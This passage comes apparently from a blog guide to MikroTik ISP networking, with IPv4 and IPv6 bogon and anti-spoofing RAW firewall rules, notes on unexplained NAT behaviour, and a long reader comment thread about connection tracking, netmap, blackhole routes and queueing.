add address=240.0.0.0/4 comment=RFC6890 list=not_in_internet
add address=192.88.99.0/24 comment="6to4 relay Anycast [RFC 3068]" list=not_in_internet
add address=255.255.255.255 comment=RFC6890 list=not_in_internet
add address=127.0.0.0/8 comment="RAW Filtering - RFC6890" list=bad_ipv4
add address=192.0.0.0/24 comment="RAW Filtering - RFC6890" list=bad_ipv4
add address=192.0.2.0/24 comment="RAW Filtering - RFC6890 documentation" list=bad_ipv4
add address=198.51.100.0/24 comment="RAW Filtering - RFC6890 documentation" list=bad_ipv4
add address=203.0.113.0/24 comment="RAW Filtering - RFC6890 documentation" list=bad_ipv4
add address=240.0.0.0/4 comment="RAW Filtering - RFC6890 reserved" list=bad_ipv4
add address=224.0.0.0/4 comment="RAW Filtering - multicast" list=bad_src_ipv4
add address=255.255.255.255 comment="RAW Filtering - RFC6890" list=bad_src_ipv4
add address=0.0.0.0/8 comment="RAW Filtering - RFC6890" list=bad_dst_ipv4
add address=224.0.0.0/4 comment="RAW Filtering - multicast" list=bad_dst_ipv4 disabled=yes
/ip firewall raw
add action=accept chain=prerouting comment="Enable this rule for transparent mode" disabled=yes
#If you are using DHCP, change this to accept#
add action=drop chain=prerouting comment="defconf: Drop DHCP discover on LAN" dst-address=255.255.255.255 dst-port=67 in-interface-list=LAN protocol=udp src-address=0.0.0.0 src-port=68
add action=drop chain=prerouting comment="defconf: drop bad src IPs" src-address-list=bad_ipv4
add action=drop chain=prerouting comment="defconf: drop bad dst IPs" dst-address-list=bad_ipv4
add action=drop chain=prerouting comment="defconf: drop bad src IPs" src-address-list=bad_src_ipv4
add action=drop chain=prerouting comment="defconf: drop bad dst IPs" dst-address-list=bad_dst_ipv4
add action=drop chain=prerouting comment="defconf: drop non global from WAN" in-interface-list=WAN src-address-list=not_in_internet
add action=drop chain=prerouting comment="defconf: drop forward to private ranges from WAN" dst-address-list=not_in_internet in-interface-list=WAN
#Remember that lan_subnets here should only include your public ranges not CGNAT#
add action=drop chain=prerouting comment="defconf: drop local if not from default IP range" in-interface-list=LAN src-address-list=!lan_subnets
add action=drop chain=prerouting comment="defconf: drop bad UDP" port=0 protocol=udp
add action=jump chain=prerouting comment="defconf: jump to TCP chain" jump-target=bad_tcp protocol=tcp
add action=jump chain=prerouting comment="defconf: jump to ICMP chain" jump-target=icmp protocol=icmp
add action=accept chain=prerouting comment="defconf: accept UDP traceroute" dst-address-type=local port=33434-33534 protocol=udp
add action=accept chain=prerouting comment="defconf: accept everything else from LAN" in-interface-list=LAN
add action=accept chain=prerouting comment="defconf: accept everything else from WAN" in-interface-list=WAN
add action=accept chain=prerouting comment="Accept local traffic to self" src-address-type=local
add action=drop chain=prerouting comment="defconf: drop the rest"
add action=drop chain=bad_tcp comment="defconf: TCP port 0 drop" port=0 protocol=tcp
add action=drop chain=bad_tcp comment="defconf: TCP flag filter" protocol=tcp tcp-flags=!fin,!syn,!rst,!ack
add action=drop chain=bad_tcp comment="defconf: TCP flag filter" protocol=tcp tcp-flags=fin,syn
add action=drop chain=bad_tcp comment="defconf: TCP flag filter" protocol=tcp tcp-flags=fin,rst
add action=drop chain=bad_tcp comment="defconf: TCP flag filter" protocol=tcp tcp-flags=fin,!ack
add action=drop chain=bad_tcp comment="defconf: TCP flag filter" protocol=tcp tcp-flags=fin,urg
add action=drop chain=bad_tcp comment="defconf: TCP flag filter" protocol=tcp tcp-flags=syn,rst
add action=drop chain=bad_tcp comment="defconf: TCP flag filter" protocol=tcp tcp-flags=rst,urg
add action=drop chain=icmp comment="Drop Source Quench (Deprecated)" icmp-options=4 protocol=icmp
add action=drop chain=icmp comment="Drop Alternate Host Address (Deprecated)" icmp-options=6 protocol=icmp
add action=drop chain=icmp comment="Drop Information Request (Deprecated)" icmp-options=15 protocol=icmp
add action=drop chain=icmp comment="Drop Information Reply (Deprecated)" icmp-options=16 protocol=icmp
add action=drop chain=icmp comment="Drop Address Mask Request (Deprecated)" icmp-options=17 protocol=icmp
add action=drop chain=icmp comment="Drop Address Mask Reply (Deprecated)" icmp-options=18 protocol=icmp
add action=drop chain=icmp comment="Drop Traceroute (Deprecated)" icmp-options=30 protocol=icmp
add action=drop chain=icmp comment="Drop Datagram Conversion Error (Deprecated)" icmp-options=31 protocol=icmp
add action=drop chain=icmp comment="Drop Mobile Host Redirect (Deprecated)" icmp-options=32 protocol=icmp
add action=drop chain=icmp comment="Drop IPv6 Where-Are-You (Deprecated)" icmp-options=33 protocol=icmp
add action=drop chain=icmp comment="Drop IPv6 I-Am-Here (Deprecated)" icmp-options=34 protocol=icmp
add action=drop chain=icmp comment="Drop Mobile Registration Request (Deprecated)" icmp-options=35 protocol=icmp
add action=drop chain=icmp comment="Drop Mobile Registration Reply (Deprecated)" icmp-options=36 protocol=icmp
add action=drop chain=icmp comment="Drop Domain Name Request (Deprecated)" icmp-options=37 protocol=icmp
add action=drop chain=icmp comment="Drop Domain Name Reply (Deprecated)" icmp-options=38 protocol=icmp
add action=drop chain=icmp comment="Drop SKIP (Deprecated)" icmp-options=39 protocol=icmp
#Mangle rules for FastTracking stateless traffic#
/ip firewall mangle
add action=fasttrack-connection chain=prerouting
add action=fasttrack-connection chain=output
IPv6 Firewall
/ipv6 firewall address-list
#Enter the aggregated public prefixes originating from your AS that you use along with link-local fe80::/10#
#example#
add address=2405:a140::/32 comment="AS Prefix" list=lan_subnets
add address=fe80::/10 comment="Link-local" list=lan_subnets
#Add your BGP peers here, example below#
add address=2400:7000:1::/126 comment="Peering with Transit on VLAN100" list=bgp_peers
#Copy Paste all the following#
add address=::/3 comment="IPv6 invalids" list=not_in_internet
add address=4000::/3 comment="IPv6 invalids" list=not_in_internet
add address=6000::/3 comment="IPv6 invalids" list=not_in_internet
add address=8000::/3 comment="IPv6 invalids" list=not_in_internet
add address=a000::/3 comment="IPv6 invalids" list=not_in_internet
add address=c000::/3 comment="IPv6 invalids" list=not_in_internet
add address=e000::/4 comment="IPv6 invalids" list=not_in_internet
add address=f000::/5 comment="IPv6 invalids" list=not_in_internet
add address=f800::/6 comment="IPv6 invalids" list=not_in_internet
add address=fc00::/7 comment="IPv6 invalids" list=not_in_internet
add address=fe00::/9 comment="IPv6 invalids" list=not_in_internet
add address=fec0::/10 comment="IPv6 invalids" list=not_in_internet
add address=2001::/23 comment="IPv6 invalids" list=not_in_internet
add address=2001:2::/48 comment="IPv6 invalids" list=not_in_internet
add address=2001:10::/28 comment="IPv6 invalids" list=not_in_internet
add address=2001:db8::/32 comment="IPv6 invalids" list=not_in_internet
add address=2002::/16 comment="IPv6 invalids" list=not_in_internet
add address=3ffe::/16 comment="IPv6 invalids" list=not_in_internet
add address=2000::/3 list="global_unicast_prefix(es)"
add address=fe80::/10 list=allowed
add address=ff02::/16 comment="multicast" list=allowed
add address=fe80::/10 comment="defconf: RFC6890 Linked-Scoped Unicast" list=no_forward_ipv6
add address=ff00::/8 comment="defconf: multicast" list=no_forward_ipv6
add address=::1/128 comment="defconf: lo" list=bad_ipv6
add address=::ffff:0:0/96 comment="defconf: ipv4-mapped" list=bad_ipv6
add address=::/96 comment="defconf: ipv4 compat" list=bad_ipv6
add address=2001:db8::/32 comment="defconf: documentation" list=bad_ipv6
add address=2001:10::/28 comment="defconf: ORCHID" list=bad_ipv6
add address=2001::/23 comment="defconf: RFC6890" list=bad_ipv6
add address=::/128 comment="defconf: unspecified" list=bad_dst_ipv6
add address=::/128 comment="RAW Filtering" list=bad_src_ipv6
add address=ff00::/8 comment="RAW Filtering" list=bad_src_ipv6
/ipv6 firewall raw
#New rule to drop deprecated extension header types 0 & 43#
#Works only on ROS v7.4 onwards#
add action=drop chain=prerouting comment="Drop packets with extension header types 0, 43 at network border" headers=hop,route:contains
add action=accept chain=prerouting comment="defconf: RFC4291, section 2.7.1" dst-address=ff02::1:ff00:0/104 icmp-options=135:0-255 protocol=icmpv6 src-address=::/128
#Migrated this rule from the forward chain on the BNG to drop these packets on the network edge#
add action=drop chain=prerouting comment="defconf: rfc4890 drop hop-limit=1" hop-limit=equal:1 in-interface-list=!LAN protocol=icmpv6
add action=drop chain=prerouting comment="drop port 25 to prevent spam" port=25 protocol=tcp
add action=drop chain=prerouting comment="drop port 25 to prevent spam" port=25 protocol=udp
#This is required for traffic whereby the SRC may be link-local and the DST is GUA for BGP peers, particularly in IXPs#
add action=accept chain=prerouting comment="Accept all ICMPv6 traffic from BGP peers (Required for LL<>GUA packets)" icmp-options=!154:4-5 in-interface-list=WAN protocol=icmpv6 src-address-list=bgp_peers
add action=drop chain=prerouting comment="Drop invalids from WAN" dst-address-list="global_unicast_prefix(es)" in-interface-list=WAN src-address-list=not_in_internet
add action=drop chain=prerouting comment="Drop forwarded invalids from WAN" dst-address-list=not_in_internet in-interface-list=WAN src-address-list="global_unicast_prefix(es)"
add action=drop chain=prerouting comment="Drop invalids from LAN" dst-address-list="global_unicast_prefix(es)" in-interface-list=LAN src-address-list=not_in_internet
add action=drop chain=prerouting comment="Drop forwarded invalids from LAN" dst-address-list=not_in_internet in-interface-list=LAN src-address-list=lan_subnets
add action=accept chain=prerouting comment="defconf: enable for transparent firewall" disabled=yes
#Drop anything from your network going towards the public internet if source addresses does not match your allocated pools#
add action=drop chain=prerouting comment="Drop spoofed traffic from LAN going towards Global Unicast" dst-address-list="global_unicast_prefix(es)" in-interface-list=LAN src-address-list=!lan_subnets
add action=drop chain=prerouting comment="defconf: drop bogon IP's" src-address-list=bad_ipv6
add action=drop chain=prerouting comment="defconf: drop bogon IP's" dst-address-list=bad_ipv6
add action=drop chain=prerouting comment="defconf: drop packets with bad src ipv6" src-address-list=bad_src_ipv6
add action=drop chain=prerouting comment="defconf: drop packets with bad dst ipv6" dst-address-list=bad_dst_ipv6
add action=accept chain=prerouting comment="defconf: accept local multicast scope" dst-address=ff02::/16
add action=drop chain=prerouting comment="defconf: drop other multicast destinations" dst-address=ff00::/8
add action=drop chain=prerouting comment="defconf: drop bad UDP" port=0 protocol=udp
add action=drop chain=prerouting comment="defconf: drop bad TCP" port=0 protocol=tcp
add action=accept chain=prerouting comment="defconf: accept UDP traceroute" dst-address-type=local port=33434-33534 protocol=udp
add action=jump chain=prerouting comment="defconf: jump to ICMP chain" jump-target=icmpv6 protocol=icmpv6
add action=accept chain=prerouting comment="defconf: accept everything else from LAN" in-interface-list=LAN
add action=accept chain=prerouting comment="defconf: accept everything else from WAN" in-interface-list=WAN
add action=accept chain=prerouting comment="Accept local traffic to self" src-address-type=local
add action=drop chain=prerouting comment="defconf: drop the rest"
add action=drop chain=icmpv6 comment="Drop FMIPv6 HI + FMIPv6 HAck - Deprecated (RFC5568)" icmp-options=154:4-5 protocol=icmpv6
Firewall Explanation
I will keep this concise. As stated earlier, I suggest you study and understand how iptables functions in general, and study the packet flow to know which rule does what. With that being said, I will break it down into simpler points:
• I used this and this as the source for building the base for the firewall
• MikroTik has taken care to conform to various RFCs and made the effort not to break any legitimate protocol/traffic
• IPv6 firewall rules are trickier and more complex, but rest assured that the rules in this article do not break any protocol/standard, nor do they impact customers’ end-to-end reachability
• We are dropping spoofed traffic
• The RAW rules drop anything coming from WAN that’s spoofed (RFC 6890 addresses)
• The RAW rules drop anything coming from LAN that does not match your public prefixes/internal subnets (aka the lan_subnets address list), meaning spoofed traffic is dropped before it exits your network
• Here’s an APNIC blog post detailing more on this subject
• Next, we are dropping bad traffic such as TCP/UDP port 0 or bad TCP flags
• The filter rules are pretty self-explanatory
Strange Anomalies
These are some strange behaviours that I could not explain. If you have further information, please reach out to me.
1. NAT Leak
• For example, let’s say we hand 100.64.0.0/24 to customers and CGNAT it behind 103.176.189.0/25. Common sense says anything WAN-bound will have a source IP belonging to the /25 on the other end of the NAT. But nope, this isn’t always the case. What I have observed is that sometimes (meaning all the time, if you have thousands of customers) the source IP is the CGNAT subnet while the destination IP is public, hence it “escapes” the NAT engine.
• This behaviour is NOT exclusive to MikroTik. I have observed the same thing on Ubuntu 20.04/Debian-based distros, where the source IP is the NAT subnet and it escapes to the WAN interface with the destination IP being a real, live public IP
• Solution: We simply drop anything coming from the BNG that is not from a public source, using the Edge Router. This is already taken care of in my configuration above; you just need to follow the instructions
• I have been unable to find documentation or bug reports on this behaviour
2. Netmap vs Src Nat
• Publicly available documentation suggests simple definitions for both
Src NAT = 1:Many binding
Netmap = 1:1 binding
• But for whatever reason, when using src NAT as the action for a public prefix, it keeps changing the “NATted” public IP and hence the source IP on the WAN for the customers. This results in traffic breaking or in triggering DDoS protection on Cloudflare-protected sites and the like
• And for whatever reason, even though Netmap is meant for 1:1, it works for 1:Many bindings and it does not result in the constant changing of source IP for the customers
• I have not found any technical information on why these behaviours occur or why netmap even works in the first place for 1:Many bindings
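To make the comparison concrete, here is a hedged sketch of the two rule forms side by side, reusing the example address list and public pool from this guide; it is an illustration, not a drop-in config:
#src NAT form, the one I observed constantly re-mapping the public source IP#
/ip firewall nat
add action=src-nat chain=srcnat out-interface-list=WAN src-address-list=cgnat_subnets to-addresses=103.176.189.0/25
#netmap form, the one that behaves as a stable 1:Many binding in practice#
add action=netmap chain=srcnat out-interface-list=WAN src-address-list=cgnat_subnets to-addresses=103.176.189.0/25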
Published in ISP Networking
113 Comments
1. Rupam Kumar Sharma
Such a detailed address of the issues that is so important while in implementation…
Thanks
2. Hi Daryll, well done!!! It was the key to fixing a problem I had been trying to solve for a customer (ISP).
I would like you to read my problem: https://forum.mikrotik.com/viewtopic.php?f=2&t=176378
I repeat, that problem is fixed now, thanks to you!
I used the following command from your article (with a few modifications):
/ip firewall nat
add action=netmap chain=srcnat comment="NETMAP PPPoE" out-interface=sfp1-Internet src-address-list=Clientes_NAT to-addresses=PUBLIC/32
I don’t understand the difference between using "srcnat action masquerade" (which wasn’t working) and using "Netmap" (which, for sure, ran perfectly fine from the first moment I put it in). I want to learn/understand why this way works.
Thanks a lot.
Regards from Argentina
• For the NAT Leak issue, it mostly looks like speculation on that thread in my opinion. No factual/documented information yet, but I’ll keep an eye on it.
3. Stefan Müller
Unfortunately, that is the case. When the conclusions are a bit more solid I will email support anyway; maybe they can resolve the mystery.
• Well, it depends on when you last visited the site? 🙂
Added:
QoS/Bandwidth management suggestion, IPv6 for BNGs with PPPoE, IPv6 tweaks, IPv6 firewalling for both Edge and BNGs, slightly tweaked the IPv4 firewall rules for both, MTU section is finalised, CGNAT section is finalised. That’s about it I think.
4. That is true :), it was the end of July.
I received a notification from WordPress yesterday that a new post was added.
As there wasn’t any, I guessed it was due to the update of the blog.
I don’t know if notifications are sent as well when the blog is updated.
5. Jeff
First off, thank you so much for this! I'm currently in the middle of a major network upgrade for our ISP and this post has been absolute gold. I've learned a ton.
Anyways, I have a quick question about the Firewall DDoS protection jump chain.
add action=jump chain=forward comment="Jump to DDoS detection" connection-state=new in-interface-list=WAN jump-target=detect-ddos
Why is it only on the forward chain and not the input chain as well? The MikroTik help page has it this way as well (forward chain only), but I've been running it on the input and forward chains for a while now. I haven't had any issues, but I'm curious whether there is any particular reason why you do not have DDoS detection on the input chain?
• Input chain means the router itself:
1. There’s nothing it will do when the DDoS traffic is hitting the router, the link will still choke. You need to have proper DDoS mitigation from/with your upstream
2. I’ve tested it for fun on the input chain and it ended up breaking traffic that’s destined towards the router itself such as DNS lookups.
Hence there’s no point in applying those rules in the input chain. They are in the forward chain in order to protect your downstream users.
6. Jeff
Hey Daryll, got another question for you.
I noticed that when disabling connection tracking on the Edge Router, the Mikrotik puts an auto RAW rule with action=no track for the prerouting and output at the very bottom of the RAW rule table.
But with the prerouting action = no track being at the bottom, no packets are hitting that rule. So I assume the firewall is still tracking connections as they pass the RAW rules above it.
The Mikrotik will not allow me to drag that rule to the top, but I can drag my other RAW rules below it and I can then see packets hitting that prerouting rule. But when I reboot the router, it places those rules back at the bottom again?
Are you seeing the same thing? Or do your prerouting action=no-track rules stay at the top? I'm on long-term v6.48.6 btw
• I believe MikroTik implements conn_track disable by means of no-track rules in the raw table, but more likely than not, what you're seeing is a bug. As long as the packets are hitting your other raw rules, it isn't an issue. Check the connection tracking tab; if there's nothing there, then we know for sure connection tracking is disabled. And as long as you're seeing the expected routing performance throughput, we can also safely assume connection tracking was disabled.
7. Jeff
So I just tried deleting all the rules and making sure I disabled connection tracking before I input the RAW rule set again. The MikroTik still places those no-track rules at the end of the rule set after a reboot. Is this a bug or is this a misunderstanding on my part?
• I just tested it out on my personal router running v7.1.1 as I wrote this, I’m unable to replicate what you saw after rebooting. I’m 100% sure it’s a bug.
I’d suggest a netinstall once with the latest long-term and ensure /system routerboard firmware is also running the latest long-term (rebooted twice for it to work).
8. Jeff
No, I definitely have connections there. The reason I rebooted my router was to see if those connections would disappear after moving the rules. I'll submit a bug to MikroTik support. Thanks for the clarification.
9. Jeff
Yea, it's a 6.48.6 bug. I'm seeing it on 4 of my CCR1036s and I duplicated it on my home RB4011. I'll be submitting this to support. Thanks again!
10. Jeff
Question: If you disable connection tracking, is there any real difference between a Filter rule vs a RAW rule? I get wanting to keep all FW rules to an absolute minimum, but if connection tracking is disabled, then from a performance perspective it would be the same, other than that a filter rule gives you more flexibility in terms of being able to block at the input or forward chain, whereas a RAW rule is more generic.
For example, if I still wanted to keep an ACL whitelist for input chain to router for security reasons, my rule would look like this.
/ip firewall filter
add action=drop chain=input comment="Drop ALL except from TRUSTED" src-address-list=!TRUSTED
• First, a caveat, the filter table cannot work without connection tracking, it is by definition stateful and hence needs state tracking.
Edge/Border routers are not supposed to have connection tracking enabled. They are routers meant to route and forward traffic inter-AS as seamlessly as possible, not to filter nor act as a firewall. The most we can do on the edge of a network is drop bogon traffic, as we know for a fact it should never enter a network to begin with and serves no functional purpose. (I will update the IPv6 raw table to drop some headers on the edge as per 2022 practices that serve no functional purpose as well)
If you enable conn_track on the edge, the performance impact will be visible downstream to the customers and your eBGP router will just randomly reboot once customers saturate the conn_track table. On top of that, you’d be creating a butterfly effect of ugly NAT keep-alive or just keep-alive traffic to now choke not only the BNGs but also the eBGP routers and impact performance even further.
The raw table gives us the ability to still firewall without the performance impact of stateful tracking. In other words, it’s stateless firewalling.
So if you want to ACL access to the router, you can still use RAW like:
/ip firewall raw
add action=drop chain=prerouting comment="Drop ALL except from TRUSTED" src-address-list=!TRUSTED dst-address-list=[Your list containing IPs of the interface/router etc]
However, although this is the most optimal option available on MikroTik, it is not the currently accepted standard or best practice, as the world moves to eBPF/XDP (while MikroTik has been playing catch-up for the last 10 years):
https://blog.cloudflare.com/how-to-drop-10-million-packets/
You can also find in the above article some data that shows no-track (conn_track disabled) outperforms conn_track enabled.
At the end of the day, if a high-performance Edge/Border router is what a network needs, it’s certainly something MikroTik cannot deliver at this point in time.
11. JJT
Under your IPv6 raw rules, is there supposed to be a !lan_subnets drop rule for the Edge Router? I don't see it.
• Create it if I missed it in the rules. Drop anything that's not from the public prefixes allocated to your network.
Edit: fe80::/10 should also be a member of lan_subnets to avoid breaking link-local.
• I’ve tweaked the !lan raw IPv6 rules. Now it makes more sense and removes the need for forward chain rule on BNG and simplifies it for the edge router.
However, should IANA ever make changes to the IPv6 blocks, you’d need to update this manually.
/ip fi raw
add action=drop chain=prerouting comment="Drop spoofed traffic from LAN going towards Global Unicast" dst-address=2000::/3 in-interface-list=LAN src-address-list=!lan_subnets
12. Jeff
Ahhhh….so to reinforce your point….and regarding that earlier bug we found, I noticed that those FW Raw ‘no track’ rules disappear inside the Raw table when I disabled my lone FW input rule with connection tracking disabled. All makes sense now.
13. Jeff
I see you have updates, but it's difficult to know what they are and where. Would it be possible to give some kind of changelog and/or highlight the improvements/changes you have made?
• I would need a systematic approach or maybe some WP plugin that can do the job. Do you know any? Writing a manual changelog for documentation this big is too much of a tedious task really.
14. Jeff
Yea, I hear ya, just throwing the idea out there. The bold explanations do help quite a bit. The BGP Optimization section is a nice addition. I learn more each time I go through it.
• Help spread the word, and share this article with other network operators and engineers, it benefits the ecosystem if everyone deployed best practices end-to-end.
If you know somebody who can convert this guide into a Cisco and Juniper equivalent, that’d be great too.
15. Jeff
Absolutely! Another poster (who introduced me to this blog) and I take every chance we get on r/mikrotik on Reddit, as well as the MikroTik forums, to share this with others. Keep up the excellent work. It's very much appreciated!
BTW, you have some minor typos you might wanna fix when you get a chance:
The address list "global_unicast_prefix(es)" in your IPv6 raw rule doesn't paste properly in the terminal:
add action=drop chain=prerouting comment="Drop invalids from WAN" dst-address-list=global_unicast_prefix(es) in-interface-list=WAN src-address-list=not_in_internet
I had to drop the parentheses inside the address list name to get it to paste into the terminal correctly, like this: "global_unicast_prefixes"
16. Jeff
And one last thing:
I see you’re doing away with the IPv4 ICMP raw filtering. Do you no longer see a benefit to filtering by ICMP types? Also, I do not see any further ICMP accept rules. Is that somehow accepted in the implied “accept everything else from LAN/WAN” rules?
• Yes. The kernel by default rate limits ICMP/ICMPv6 anyway, and hence those rules are redundant and a waste of CPU. All ICMP/ICMPv6 is accepted; let the kernel handle rate limiting.
Don’t miss the new RFC6890 section 🙂
17. Jeff
Yea I see the RFC6890 blackhole section, I think that part is awesome. I was doing that with my public subnet but using it for the RFC6890 is an excellent idea.
In regards to ICMP, I get the rate limits, but what about the allowed ICMP types? Aren't there some deprecated and malicious ICMP types that should not be allowed? Or I guess in this case, you only allow specific ICMP types?
• Yeah, I will edit the RFC6890 section and say “Inject these rules into any router/L3 switch that has a routing table” – Makes perfect sense if you really think about it.
There are deprecated ICMP types, yes, but I haven’t seen any hard evidence of them doing any damage if they aren’t blocked, and even if somehow they could, again they are rate limited. So why waste CPU power anyway. As long as everything else is properly configured, the network should be secure.
You’d need ICMP filtering maybe for DoD/DARPA stuff or something, but eh, not at ISP level in my opinion. I’ve removed all ICMP filtering in my own network and my home routers as well.
18. Jeff
Previously, I couldn't believe how much garbage this rule was collecting.
#This rule should be redundant as we are now routing RFC6890 to blackhole directly and hence I am commenting it out#
#add action=drop chain=forward comment="Drop tries to reach not public addresses from LAN" dst-address-list=not_in_internet in-interface-list=LAN out-interface-list=WAN#
It was every single router, regardless of the type of network; there was always tons of garbage. And I couldn't believe there was that much of it, everywhere. My guess is random misconfigurations and/or crap device code.
I then implemented the blackhole routes and WOW… it's mostly all gone now.
And I say "mostly" because there's one small caveat I noticed. One of my sites has a failover which is a double NAT through another provider. With the failover WAN IP being in the 192.168.x.x subnet, bandit packets are still hitting the above rule. Which makes sense if you think about it. It's a minor issue, not that big a deal, especially on a site of its kind. But I thought it was worth mentioning.
• It’s not just misconfiguration. For unknown reasons my personal Windows 11, Debian Based, iOS, macOS devices all originate such packets. I never found an explanation.
That's expected behaviour in your specific site:
A more specific route is always preferred over a less specific route. I'd leave it be; not much harm can happen there.
19. Anav
Hi Daryll. In terms of netmap: the way I understand it, in my layman's terms, is that if one has a subnet of fixed public IPs being netmapped to a larger group of private IPs, what happens is what I call a slice or jump pattern of assignment. Initially I thought, okay, for a 256 block of public IPs, the first 256 private IPs are assigned to the first public IP. Wrong. It's the 1st, 257th, 513th etc. private IPs that get assigned to that public IP. So it's fair to say that the same block of private IPs (via slices or jumps) always gets the same public IP. Hope that helps.
• I already knew that netmap ensures 1:1 mapping, i.e. 1.1.1.1 netmapped to 100.64.0.7 will persistently stay the same until a reboot or similar. Which is perfect for P2P/STUN/ICE/WebRTC/TURN. But the question is: why does netmap of a public /24 work with a private /8, for example? The Linux man page suggests it shouldn't.
Edit: Wait a minute, this is "Anav" from the MikroTik forums, ain't it? I'm just going to leave this here.
20. Johan
Hello
That's great work.
I have a question: what is the real purpose of loose TCP tracking?
Is it a separate kind of tracking alongside the original connection tracking?
• With PPPoE, it is easier. But I think you would need to give persistent IPv6 PD assignments (which you should be doing anyways), and then Queue on a per prefix basis where a customer is behind each of them.
But if you’re going the DHCPv6 route – With Tik, there’s a problem. It can only hand out PD, but not addresses. Which means the customer will receive a /56 or shorter prefixes for LAN, but their WAN (Link prefix) will be null, unless you use a /64 on a per interface basis with SLAAC and configure the CPE to pick it up via SLAAC for WAN. But even then you’ll have a problem. SLAAC in Tik is not managed via RADIUS – So you won’t know which customer was assigned which address and so on.
I’d suggest talking with stubarea51 consulting firm and let me know if you find a solution. I’ll add it to my guide.
Matter of fact if you’re already doing DHCPv4, let me know the whole procedure (via emails), I’ll add that to my guide too – Like how did you set up DHCP Option 82, MAC binding, security. Did you use VRFs maybe? To repeat RFC1918 for different VLANs etc?
21. Steven
Hi Daryll
Thanks for this article
I have an idea about the routing loop. What about adding the RFC6890 ranges to routing rules with a lookup-only table, where the route in that table just points to blackhole?
• The whole point is to route less specifics to blackhole. Which is applicable to both RFC6890 blocks and also public pools.
What is lookup supposed to serve? I don’t see the need to possibly (if I understood you) create a blackhole only table?
22. Steven
Here is an example
/routing table
add disabled=no fib name=Blackhole
/routing rule
add action=lookup-only-in-table disabled=no dst-address=192.168.0.0/16 table=Blackhole
add action=lookup-only-in-table disabled=no dst-address=10.0.0.0/8 table=Blackhole
add action=lookup-only-in-table disabled=no dst-address=172.16.0.0/12 table=Blackhole
add action=lookup-only-in-table disabled=no dst-address=255.255.255.255/32 interface=BNG table=Blackhole
/ip route
add blackhole comment=Blackhole disabled=no distance=1 dst-address=0.0.0.0/0 gateway="" pref-src="" routing-table=Blackhole scope=30 suppress-hw-offload=no \
target-scope=10
• I don't see any reason to use a separate table. If anything, this would probably increase CPU usage as it now has to do a separate lookup for each subnet.
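As a hedged illustration of what I mean (ROS v7 syntax; on v6 use type=blackhole instead of the blackhole flag), plain blackhole routes in the main table for the RFC6890 blocks used earlier in this guide:
/ip route
add dst-address=10.0.0.0/8 blackhole comment="RFC6890 blackhole"
add dst-address=172.16.0.0/12 blackhole comment="RFC6890 blackhole"
add dst-address=192.168.0.0/16 blackhole comment="RFC6890 blackhole"
add dst-address=100.64.0.0/10 blackhole comment="RFC6890 blackhole"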
23. Johannes
Hi Daryll,
First of all: thank you so much for this extensive, well documented piece of work!
I’m used to building networks with cisco and juniper equipment but fell in love with mikrotik stuff, built my own little ipv6 only AS with it and am now in the process of optimizing basic stuff. That’s when I arrived here – and rethought my firewalling from the ground up thanks to your great work! So thanks again!
I do have one question though: Running ROS7 and changed from stateful firewall filter rules to modified versions of your raw filters. While this did the trick to get rid of IPv4 connection tracking, I still have “living” entries in ipv6/firewall/connections – without any filter rules. And there is no ipv6/firewall/connection/tracking submenu to disable it manually. Am I missing something or is it not possible to turn off connection tracking for IPv6?
Second, more general question: you seem to have updated this blog entry on June 29th. Is there some kind of changelog I could refer to for your changes? 😉 Otherwise I might have to download this entry to a local git repo to stay up to date 🙂
Thanks again for your terrific work and best regards from Germany,
Johannes
• IPv6 connection tracking is automatically disabled on both ROSv6 and ROSv7 if there is nothing in /ipv6 firewall filter or mangle or nat(66). If it’s still tracking, then I suggest you contact MikroTik support, as that sounds like a bug.
Minor typos were fixed on June 29th. I cannot keep changelogs of such a large documentation, but if you know of any WordPress plugin that can automate the job of a change log, then please by all means, do share, I’ll make use of it.
I’m glad my guide was of use to your network. Furthermore, I hope you follow all the BCPs and BCOPs for your network to ensure a fully conforming and homogenous network!
24. Mehhmet van der Loyer
Are you positive you didn't get this the wrong way round? Loose tracking = off, i.e. strict tracking enabled, will cause already-established connections not to be picked up?
Can you please expand on this?
I would expect this setting to correspond to the netfilter loose tracking mode, which has fewer sanity checks around NEW state packets, penultimate FIN packets, etc.
25. while this was very good, sfq does not fix bufferbloat. fq_codel/cake do. the test you used measures fq not queue depth (aqm). try a packet capture on that test.
• Hi Dave
A few points to note and consider:
1. This article dates back to 2021 back on RouterOS v6 when fq_codel/CAKE did not exist on MikroTik
2. I did not claim that SFQ "fixes" bufferbloat, only that it reduces it
3. I do not have the time to test QoS any further. If you have hard data/configuration used on a BNG device serving a minimum of 200 users, feel free to share the config, screenshots, and guidelines. I will consider adding that to the article and credit such a section to your name.
Furthermore, I’m not a specialist in QoS, so I’m not sure what you mean by “fq not queue depth (aqm)”, but at the time of testing, the device had around 1k customers with at least minimum 1Gig traffic going in/out.
26. There was a lot of uptake of fq_codel after it arrived in mikrotik. Very long thread over here about sfq vs cake in particular:
https://forum.mikrotik.com/viewtopic.php?t=179307#p885613
As for a guide, I will try to find someone deploying. Basically on cpe we are seeing cake ack-filter bandwidth XMbit diffserv4 on a simple queue on the up, and I don’t really know what is used on the bng side (seeing preseem/libreqos/cambium/
Apologies for misconstruing your statement. FQ is what the test you used measures; queue depth (managed via AQM) is bufferbloat. FQ bypasses the queue-building flows.
• Yes, I know MikroTik added fq_codel/CAKE etc in RouterOS v7, but back in 2021, RouterOS v7 was not production-ready and hence was not tested. I lack the time to implement it on my own personal network as well, but hopefully, I’ll get to it eventually.
Most network operators in APAC that are using MikroTik a lot for BNGs, just use whatever MikroTik defaults come with for the queuing algorithm, so SFQ, PFIFO etc. They do not spend in-depth testing and research into what method works best for their network, at least on BNG level – This was the main reason for SFQ as I observed it “just works” even if not perfect. There’s a psychological factor at play, details here.
Ah, you mean, the “bufferbloat” test from DSLReports? Well, I can update that with a more proper web-based bufferbloat test site, sure, but I’ll need the “guide” though (config, data, screenshots, explanation to the reader etc).
Feel free to email me directly for further discussion or message via my Telegram (both are on the left sidebar at the top).
27. Mr_Black
Hi Daryll
I had an idea about NAT.
Why do you add not_in_internet as the dst-address list?
Is it not enough to add the same src-address list as the dst, like this example?
/ip firewall nat add
action=netmap chain=srcnat comment="CGNAT rule" dst-address-list=!cgnat_subnets ipsec-policy=out,none out-interface-list=WAN src-address-list=cgnat_subnets to-addresses=103.176.189.0/25
• not_in_internet address list contains all the RFC6890 subnets including the CGNAT subnet range in aggregated format.
cgnat_subnets only contains either supernets or just the /10 subnet.
That is why we need not_in_internet.
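Putting the two lists together, a hedged sketch of the CGNAT rule with the correct dst list, reusing the example public pool from this guide:
/ip firewall nat
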